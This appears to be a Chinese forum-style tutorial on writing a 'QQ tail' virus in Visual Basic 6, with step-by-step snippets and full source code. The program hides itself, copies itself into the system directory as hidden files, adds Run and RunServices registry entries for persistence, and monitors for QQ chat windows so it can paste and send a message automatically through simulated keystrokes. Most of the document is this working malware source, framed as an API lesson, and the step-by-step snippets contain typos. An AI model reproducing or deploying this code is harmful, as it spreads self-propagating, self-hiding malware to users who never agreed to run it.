QQ尾巴病毒制作
QQ尾巴过时好久了,俺再写一个!!让大家学几个API!!^^
在家玩得很无聊,除了吃就是睡,日子一天天地过去了,QQ却帮我打发了不少时间.事发那天,一个好友发
给我一条信息,说是某个网站有好听的音乐叫我上去听听,于是我点击了那个网址上去了,然而我却没有发现
那个网站有什么音乐听.随即我便用QQ发信自,谁知当我打开聊天窗口时,QQ那家伙立刻帮我发了一条信息给
对方,和我刚才收到的那条一模一样,哈哈,好一个QQ尾巴.于是我马上check run,发现注册表RUN项多了两个
可疑的项,于是删掉它,并根据路径把它KILL掉.
反正在家无聊于是研究一下它,当我运行它时
1.它会使自身在桌面和任务栏上隐藏;
2.在注册表的RUN项建一个子键使之能开机自动运行;
3.复制自己到系统目录下,并隐藏;
4.监视桌面前台窗口,并捕捉QQ聊天窗口;
5.当发现QQ窗口时就立刻模拟键盘将一条信息复制上去并发送.
就这么简单!它没有用到HOOK钩子截取系统消息,想了想,哈,俺用VB也能写一个,不就是几个常用的API
嘛.反正无聊,开工.......
首先介绍一下要用到的API吧
1.GetWindow 取得所属窗口句柄;
2.ShowWindow 窗口设置;
3.GetSystemDirectory 取得系统目录路径;
4.RegCreateKey 打开注册表的项;
5.RegSetValueEx 新建子键;
6.RegCloseKey 关闭注册表;
7.GetForegroundWindow 取得前台窗口句柄;
8.GetWindowText 取得前台窗口的标题;
9.Keybd_event 模拟键盘事件.
第一步:隐藏!!
API声明: GetWindow ShowWindow
常数: GW_OWNER SW_HIDE
dim a as long
a=GetWindow(me.hwnd , GW_OWNER)
ShowWindow a , SW_HIDE
me.visible=false
第二步:取得系统目录路径!
API声明: GetSystemDirectory
dim b as string
b=space(19)
GetSystemDirectory b , 20
第三步:修改注册表!
API声明: RegCreateKey RegSetValueEx RegCloseKey
常数: HKEY_LOCAL_MACHINE,REG_SZ
dim c as string
dim d as string
dim e as long
c="SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
d=b & "\file32.exe"
RegCreateKey HKEY_LOCAL_MACHINE , c , e
RegSetValueEx e , "file32" , 0 , REG_SZ , byval d , len(d)
RegCloseKey e
第四步:复制自己到系统目录下,并隐藏!
dim f as string
f=app.path & "\" & app.exename & ".exe"
filecopy f , d
setarrt d , vbhiden
第五步:监视前台窗口!
API声明: GetForegroundWindow GetWindowText
dim g as long
dim h as string
h=space(256)
g=GetForegroundWindow()
GetWindowText g , h , 255
'判断前台窗口是否QQ窗口,如果是就进入第六步,如果不是则继续监视
'这处代码应放在TIMER中!
if left(h,1)="与" then
call stup six(第六步)
end if
第六步:设定剪切板内容,并模拟键盘(CTRL+V)粘贴,(ENTER OR ENTER+CTRL)发送!
API声明: Keybd_event
常数: vk_control(&h11) vk_v(86) keyeventf_keyup(&h2)
clipboard.clear
clipboard.settext "恭喜你,高中了QQ尾巴病毒!"
keybd_ecent vk_control,0,0,0
keybd_event 86,0,0,0
keybd_ecent 86,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
keybd_ecent 13,0,0,0
keybd_ecent 13,0,keyeventf_keyup,0
keybd_event vk_control,0,0,0
keybd_ecent 13,0,0,0
keybd_event 13,0,keyeventf_keyup,0
keybd_event vk_control,0,keyeventf_keyup,0
clipboard.clear
完整代码如下:
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Const GW_OWNER = 4
Private Const SW_HIDE = 0
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Const KEYEVENTF_KEYUP = &H2
Dim j As String
Dim k As String
Dim ii As Integer
Dim e, f As String
Private Sub Form_Load()
Dim a As Long
Dim b As String
Dim c, d As String
Dim e1 As String
Dim e2 As String
Dim f1, f2 As Long
Me.Visible = False
a = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow a, SW_HIDE
b = Space(19)
GetSystemDirectory b, 20
c = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
d = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
e1 = b & "\File32.exe"
e2 = Left(b, 11) & "Rencom.exe"
RegCreateKey HKEY_LOCAL_MACHINE, c, f1
RegSetValueEx f1, "File32", 0, REG_SZ, ByVal e1, Len(e1)
RegCloseKey f1
RegCreateKey HKEY_LOCAL_MACHINE, d, f2
RegSetValueEx f2, "Rencom", 0, REG_SZ, ByVal e2, Len(e2)
RegCloseKey f2
On Error Resume Next
Dim g As String
g = App.Path & "\" & App.EXEName & ".exe"
FileCopy g, e1
SetAttr e1, vbHidden
FileCopy g, e2
SetAttr e2, vbHidden
e = e1
f = e2
End Sub
Private Sub Timer1_Timer()
ii = ii + 1
If ii = 1111 Then ii = 1
Dim h As Long
Dim i As String
h = GetForegroundWindow()
i = Space(256)
GetWindowText h, i, 255
If Left(i, 1) = "与" And ii Mod 20 = 8 Then
j = Space(256)
j = i
Call mer
End If
End Sub
Sub mer()
If k <> j Then
Clipboard.Clear
Clipboard.SetText "恭喜你,高中了QQ尾巴病毒!"
keybd_event &H11, 0, 0, 0
keybd_event 86, 0, 0, 0
keybd_event 86, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, 0, 0
keybd_event 13, 0, 0, 0
keybd_event 13, 0, KEYEVENTF_KEYUP, 0
keybd_event &H11, 0, KEYEVENTF_KEYUP, 0
k = Space(256)
k = j
End If
End Sub
QQ尾巴病毒是Visual C++来实现的!
QQ尾巴病毒的Visual C++实现探讨
http://www.jclm88.com/article/16/162/567/2006/200607142072.html
QQ尾巴病毒制作
http://www.ndsftc.com/bbs/dispbbs.asp?boardid=27&id=224